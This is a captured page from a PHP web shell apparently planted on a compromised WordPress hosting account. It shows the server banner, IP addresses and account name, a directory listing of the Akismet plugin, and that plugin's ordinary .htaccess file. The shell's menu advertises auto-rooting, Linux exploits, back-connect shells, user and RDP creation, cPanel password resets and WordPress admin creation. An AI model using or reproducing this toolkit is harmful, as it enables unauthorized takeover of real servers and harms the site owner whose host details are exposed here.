Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.104
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
vmd /
wp-content /
plugins /
akismet /
[ HOME SHELL ]
Name
Size
Permission
Action
_inc
[ DIR ]
drwx---r-x
views
[ DIR ]
drwx---r-x
.htaccess
633
B
-rw----r--
LICENSE.txt
17.67
KB
-rw----r--
akismet.php
2.48
KB
-rw----r--
changelog.txt
21.45
KB
-rw----r--
class.akismet-admin.php
51.82
KB
-rw----r--
class.akismet-cli.php
4.55
KB
-rw----r--
class.akismet-rest-api.php
10.87
KB
-rw----r--
class.akismet-widget.php
3.04
KB
-rw----r--
class.akismet.php
65.32
KB
-rw----r--
index.php
26
B
-rw----r--
readme.txt
3.16
KB
-rw----r--
wrapper.php
6.29
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .htaccess
# Only allow direct access to specific Web-available files. # Apache 2.2 <IfModule !mod_authz_core.c> Order Deny,Allow Deny from all </IfModule> # Apache 2.4 <IfModule mod_authz_core.c> Require all denied </IfModule> # Akismet CSS and JS <FilesMatch "^(form\.js|akismet\.js|akismet\.css)$"> <IfModule !mod_authz_core.c> Allow from all </IfModule> <IfModule mod_authz_core.c> Require all granted </IfModule> </FilesMatch> # Akismet images <FilesMatch "^logo-(a|full)-2x\.png$"> <IfModule !mod_authz_core.c> Allow from all </IfModule> <IfModule mod_authz_core.c> Require all granted </IfModule> </FilesMatch>
Close